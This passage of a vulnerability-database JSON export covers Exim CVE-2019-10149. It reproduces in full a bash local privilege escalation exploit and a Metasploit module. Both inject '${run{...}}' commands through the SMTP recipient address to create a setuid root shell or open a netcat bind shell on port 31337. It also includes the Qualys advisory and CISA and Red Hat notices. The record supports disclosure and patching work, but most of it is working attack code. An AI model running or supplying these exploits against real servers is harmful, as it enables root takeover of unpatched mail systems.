\necho \"Received: $i\" >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n} \n \n# print banner \necho \necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit' \necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' \necho \n \n# parse command line \nwhile [ ! -z \"$1\" ]; do \ncase $1 in \n-m) shift; METHOD=\"$1\"; shift;; \n* ) usage \n;; \nesac \ndone \nif [ -z $METHOD ]; then \nusage \nfi \n \n# setuid method \nif [ $METHOD = \"setuid\" ]; then \n \n# prepare a setuid shell helper to circumvent bash checks \necho \"Preparing setuid shell helper...\" \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c \ngcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null \nif [ $? -ne 0 ]; then \necho \"Problems compiling setuid shell helper, check your gcc.\" \necho \"Falling back to the /bin/sh method.\" \ncp /bin/sh /tmp/pwned \nfi \necho \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_SETUID \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nls -l /tmp/pwned \n/tmp/pwned \n \n# netcat method \nelif [ $METHOD = \"netcat\" ]; then \n \n# select and deliver the payload \necho \"Delivering $METHOD payload...\" \nPAYLOAD=$PAYLOAD_NETCAT \nexploit \necho \n \n# wait for the magic to happen and spawn our shell \necho \"Waiting 5 seconds...\" \nsleep 5 \nnc -v 127.0.0.1 31337 \n \n# print help \nelse \nusage \nfi \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/153312/raptor_exim_wiz.sh.txt"}], "zdt": [{"lastseen": "2019-06-18T13:57:26", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2019-06-17T00:00:00", "type": "zdt", "title": "Exim 4.91 Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": 
["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "1337DAY-ID-32869", "href": "https://0day.today/exploit/description/32869", "sourceData": "#!/bin/bash\r\n\r\n#\r\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\r\n# Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \r\n# Improper validation of recipient address in deliver_message() \r\n# function in /src/deliver.c may lead to remote command execution.\r\n# (CVE-2019-10149)\r\n#\r\n# This is a local privilege escalation exploit for \"The Return \r\n# of the WIZard\" vulnerability reported by the Qualys Security \r\n# Advisory team.\r\n#\r\n# Credits:\r\n# Qualys Security Advisory team (kudos for your amazing research!)\r\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\r\n#\r\n# Usage (setuid method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m setuid\r\n# Preparing setuid shell helper...\r\n# Delivering setuid payload...\r\n# [...]\r\n# Waiting 5 seconds...\r\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Usage (netcat method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m netcat\r\n# Delivering netcat payload...\r\n# Waiting 5 seconds...\r\n# localhost [127.0.0.1] 31337 (?) 
open\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Vulnerable platforms:\r\n# Exim 4.87 - 4.91\r\n#\r\n# Tested against:\r\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\r\n#\r\n\r\nMETHOD=\"setuid\" # default method\r\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\r\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\r\n\r\n# usage instructions\r\nfunction usage()\r\n{\r\n echo \"$0 [-m METHOD]\"\r\n echo\r\n echo \"-m setuid : use the setuid payload (default)\"\r\n echo \"-m netcat : use the netcat payload\"\r\n echo\r\n exit 1\r\n}\r\n\r\n# payload delivery\r\nfunction exploit()\r\n{\r\n # connect to localhost:25\r\n exec 3<>/dev/tcp/localhost/25\r\n\r\n # deliver the payload\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"rcpt to:<$PAYLOAD>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in {1..31}\r\n do\r\n echo \"Received: $i\" >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n}\r\n\r\n# print banner\r\necho\r\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\r\necho 'Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>'\r\necho\r\n\r\n# parse command line\r\nwhile [ ! -z \"$1\" ]; do\r\n case $1 in\r\n -m) shift; METHOD=\"$1\"; shift;;\r\n * ) usage\r\n ;;\r\n esac\r\ndone\r\nif [ -z $METHOD ]; then\r\n usage\r\nfi\r\n\r\n# setuid method\r\nif [ $METHOD = \"setuid\" ]; then\r\n\r\n # prepare a setuid shell helper to circumvent bash checks\r\n echo \"Preparing setuid shell helper...\"\r\n echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\r\n gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\r\n if [ $? 
-ne 0 ]; then\r\n echo \"Problems compiling setuid shell helper, check your gcc.\"\r\n echo \"Falling back to the /bin/sh method.\"\r\n cp /bin/sh /tmp/pwned\r\n fi\r\n echo\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_SETUID\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n ls -l /tmp/pwned\r\n /tmp/pwned\r\n\r\n# netcat method\r\nelif [ $METHOD = \"netcat\" ]; then\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_NETCAT\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n nc -v 127.0.0.1 31337\r\n\r\n# print help\r\nelse\r\n usage\r\nfi\n\n# 0day.today [2019-06-18] #", "sourceHref": "https://0day.today/exploit/32869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-26T22:37:22", "description": "This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). 
Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T00:00:00", "type": "zdt", "title": "Exim 4.87 / 4.91 - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "1337DAY-ID-33150", "href": "https://0day.today/exploit/description/33150", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'expect'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\r\n 
Improper validation of recipient address in deliver_message()\r\n function in /src/deliver.c may lead to command execution with root privileges\r\n (CVE-2019-10149).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and PoC (@qualys)\r\n 'Dennis Herrmann', # Working exploit (@dhn)\r\n 'Marco Ivaldi', # Working exploit (@0xdea)\r\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\r\n ],\r\n 'DisclosureDate' => '2019-06-05',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [\r\n 'Exim 4.87 - 4.91',\r\n lower_version: Gem::Version.new('4.87'),\r\n upper_version: Gem::Version.new('4.91')\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependSetgid' => true,\r\n 'PrependSetuid' => true\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-10149' ],\r\n [ 'EDB', '46996' ],\r\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\r\n ]\r\n ))\r\n\r\n register_options(\r\n [\r\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\r\n OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def encode_command(cmd)\r\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\r\n end\r\n\r\n def open_tcp_connection\r\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\r\n params = Rex::Socket::Parameters.new({\r\n 'PeerHost' => '127.0.0.1',\r\n 'PeerPort' => datastore['EXIMPORT']\r\n })\r\n begin\r\n socket = socket_subsystem.create_tcp_client_channel(params)\r\n rescue => e\r\n vprint_error(\"Couldn't 
connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n raise e\r\n end\r\n return socket_subsystem, socket\r\n end\r\n\r\n def inject_payload(payload)\r\n if session.type == 'meterpreter'\r\n socket_subsystem, socket = open_tcp_connection\r\n\r\n tcp_conversation = {\r\n nil => /220/,\r\n 'helo localhost' => /250/,\r\n \"MAIL FROM:<>\" => /250/,\r\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\r\n 'DATA' => /354/,\r\n 'Received:' => nil,\r\n '.' => /250/\r\n }\r\n\r\n begin\r\n tcp_conversation.each do |line, pattern|\r\n Timeout.timeout(datastore['SendExpectTimeout']) do\r\n if line\r\n if line == 'Received:'\r\n for i in (1..31)\r\n socket.puts(\"#{line} #{i}\\n\")\r\n end\r\n else\r\n socket.puts(\"#{line}\\n\")\r\n end\r\n end\r\n if pattern\r\n socket.expect(pattern)\r\n end\r\n end\r\n end\r\n rescue Rex::ConnectionError => e\r\n fail_with(Failure::Unreachable, e.message)\r\n rescue Timeout::Error\r\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\r\n ensure\r\n socket.puts(\"QUIT\\n\")\r\n socket.close\r\n socket_subsystem.shutdown\r\n end\r\n else\r\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\r\n \"&& echo true\").chomp.to_s == 'true'\r\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\r\n end\r\n\r\n bash_script = %|\r\n #!/bin/bash\r\n\r\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in $(seq 1 30); do\r\n echo 'Received: $i' >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n |\r\n\r\n @bash_script_path = File.join(base_dir, 
Rex::Text.rand_text_alpha(10))\r\n write_file(@bash_script_path, bash_script)\r\n register_file_for_cleanup(@bash_script_path)\r\n chmod(@bash_script_path)\r\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\r\n end\r\n\r\n print_status('Payload sent, wait a few seconds...')\r\n Rex.sleep(5)\r\n end\r\n\r\n def check_for_bash\r\n unless command_exists?('/bin/bash')\r\n fail_with(Failure::NotFound, 'bash not found')\r\n end\r\n end\r\n\r\n def on_new_session(session)\r\n super\r\n\r\n if session.type == 'meterpreter'\r\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\r\n session.fs.file.rm(@payload_path)\r\n else\r\n session.shell_command_token(\"rm -f #{@payload_path}\")\r\n end\r\n end\r\n\r\n def check\r\n if session.type == 'meterpreter'\r\n begin\r\n socket_subsystem, socket = open_tcp_connection\r\n rescue\r\n return CheckCode::Safe\r\n end\r\n res = socket.gets\r\n socket.close\r\n socket_subsystem.shutdown\r\n else\r\n check_for_bash\r\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\r\n \"(read -u 3 && echo $REPLY) || echo false'\")\r\n if res == 'false'\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n if res =~ /Exim ([0-9\\.]+)/i\r\n version = Gem::Version.new($1)\r\n vprint_status(\"Found exim version: #{version}\")\r\n if version >= target[:lower_version] && version <= target[:upper_version]\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.')\r\n end\r\n end\r\n\r\n unless writable?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\r\n end\r\n\r\n if nosuid?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\r\n end\r\n\r\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\r\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\r\n 'to get root privileges.')\r\n end\r\n\r\n if session.type == 'shell'\r\n check_for_bash\r\n end\r\n\r\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@payload_path, payload.encoded_exe)\r\n register_file_for_cleanup(@payload_path)\r\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\r\n \"chmod 4755 #{@payload_path}'\"))\r\n\r\n unless setuid?(@payload_path)\r\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\r\n end\r\n\r\n cmd_exec(\"#{@payload_path} & echo \")\r\n end\r\nend\n\n# 0day.today [2021-09-27] #", "sourceHref": "https://0day.today/exploit/33150", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-13T00:22:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-07T00:00:00", "type": "zdt", "title": "Exim 4.87 < 4.91 - (Local / Remote) Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0095", "CVE-1999-0145", "CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "1337DAY-ID-32848", "href": "https://0day.today/exploit/description/32848", "sourceData": "Qualys Security Advisory\n\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nLocal exploitation\nRemote exploitation\n- Non-default configurations\n- Default configuration\nAcknowledgments\nTimeline\n\n Boromir: \"What is this new devilry?\"\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\n -- The Lord of the Rings: The Fellowship of the Ring\n\n\n========================================================================\nSummary\n========================================================================\n\nDuring a code review of the latest changes in the Exim mail server\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\nRemote *Command* Execution, not Remote Code Execution: an attacker can\nexecute arbitrary commands with execv(), as root; no memory corruption\nor ROP (Return-Oriented Programming) is involved.\n\nThis vulnerability is exploitable instantly by a local attacker (and by\na remote attacker in certain non-default configurations). To remotely\nexploit this vulnerability in the default configuration, an attacker\nmust keep a connection to the vulnerable server open for 7 days (by\ntransmitting one byte every few minutes). 
However, because of the\nextreme complexity of Exim's code, we cannot guarantee that this\nexploitation method is unique; faster methods may exist.\n\nExim is vulnerable by default since version 4.87 (released on April 6,\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\n(released on February 10, 2019):\n\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\nhttps://bugs.exim.org/show_bug.cgi?id=2310\n\nbut was not identified as a security vulnerability, and most operating\nsystems are therefore affected. For example, we exploit an up-to-date\nDebian distribution (9.9) in this advisory.\n\n\n========================================================================\nLocal exploitation\n========================================================================\n\nThe vulnerable code is located in deliver_message():\n\n6122 #ifndef DISABLE_EVENT\n6123 if (process_recipients != RECIP_ACCEPT)\n6124 {\n6125 uschar * save_local = deliver_localpart;\n6126 const uschar * save_domain = deliver_domain;\n6127\n6128 deliver_localpart = expand_string(\n6129 string_sprintf(\"${local_part:%s}\", new->address));\n6130 deliver_domain = expand_string(\n6131 string_sprintf(\"${domain:%s}\", new->address));\n6132\n6133 (void) event_raise(event_action,\n6134 US\"msg:fail:internal\", new->message);\n6135\n6136 deliver_localpart = save_local;\n6137 deliver_domain = save_domain;\n6138 }\n6139 #endif\n\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\nexpansion item, and because new->address is the recipient of the mail\nthat is being delivered, a local attacker can simply send a mail to\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\nlocal_domains) and execute arbitrary commands, as root\n(deliver_drop_privilege is false, by 
default):\n\n[...]\n\n\n========================================================================\nRemote exploitation\n========================================================================\n\nOur local-exploitation method does not work remotely, because the\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\nconfiguration requires the local part of the recipient's address (the\npart that precedes the @ sign) to be the name of a local user:\n\n[...]\n\n------------------------------------------------------------------------\nNon-default configurations\n------------------------------------------------------------------------\n\nWe eventually devised an elaborate method for exploiting Exim remotely\nin its default configuration, but we first identified various\nnon-default configurations that are easy to exploit remotely:\n\n- If the \"verify = recipient\" ACL was removed manually by an\n administrator (maybe to prevent username enumeration via RCPT TO),\n then our local-exploitation method also works remotely.\n\n- If Exim was configured to recognize tags in the local part of the\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\n then a remote attacker can simply reuse our local-exploitation method\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\n name of a local user).\n\n- If Exim was configured to relay mail to a remote domain, as a\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\n (where \"khazad.dum\" is one of Exim's relay_to_domains). 
Indeed, the\n \"verify = recipient\" ACL can only check the domain part of a remote\n address (the part that follows the @ sign), not the local part.\n\n------------------------------------------------------------------------\nDefault configuration\n------------------------------------------------------------------------\n\n[...]\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank Exim's developers, Solar Designer, and the members of\n[email\u00a0protected]\n\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\nDEBUG vulnerabilities:\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\nhttps://seclists.org/bugtraq/1995/Feb/56\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\nhttp://www.cheswick.com/ches/papers/berferd.pdf\n\n\n========================================================================\nTimeline\n========================================================================\n\n2019-05-27: Advisory sent to [email\u00a0protected]\n\n2019-05-28: Advisory sent to [email\u00a0protected]\n", "sourceHref": "https://0day.today/exploit/32848", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-27T18:20:26", "description": "Exim has released patches to address a vulnerability affecting Exim versions 4.87\u20134.91. A remote attacker could exploit this vulnerability to take control of an affected email server. 
This vulnerability was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Exim [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) page and either upgrade to Exim 4.92 or apply the necessary patches.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-13T00:00:00", "type": "cisa", "title": "Exim Releases Security Patches", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-13T00:00:00", "id": "CISA:8012376262FFBCAA3DBEE889B5EE4625", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-27T18:18:25", "description": "The National Security Agency (NSA) has released a cybersecurity advisory on Russian advanced persistent threat (APT) group Sandworm exploiting a vulnerability\u2014CVE-2019-10149\u2014in Exim Mail Transfer Agent (MTA) software. An unauthenticated remote attacker can use this vulnerability to send a specially crafted email to execute commands with root privileges, allowing the attacker to install programs, modify data, and create new accounts.\n\nAlthough Exim released a [security update](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for the MTA vulnerability in June 2019, Sandworm cyber actors have been exploiting this vulnerability in unpatched Exim servers since at least August 2019 according NSA\u2019s advisory, which provides indicators of compromise and mitigations to detect and block exploit attempts.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators and users to upgrade to the latest version of Exim and review NSA\u2019s [Advisory: Exim Mail Transfer Agent Actively Exploited by Russian GRU Cyber Actors](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) and Exim\u2019s page on [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-28T00:00:00", "type": "cisa", "title": "NSA Releases Advisory on Sandworm Actors Exploiting an Exim Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-28T00:00:00", "id": "CISA:0112C06A4ED522FC96CC36F94A083A95", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-06-13T15:00:02", "description": "A flaw was found in Exim, where improper validation of the recipient address in the deliver_message() function in /src/deliver.c occurred. 
An attacker could use this flaw to achieve remote command execution.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T12:51:00", "type": "redhatcve", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2023-04-06T05:51:03", 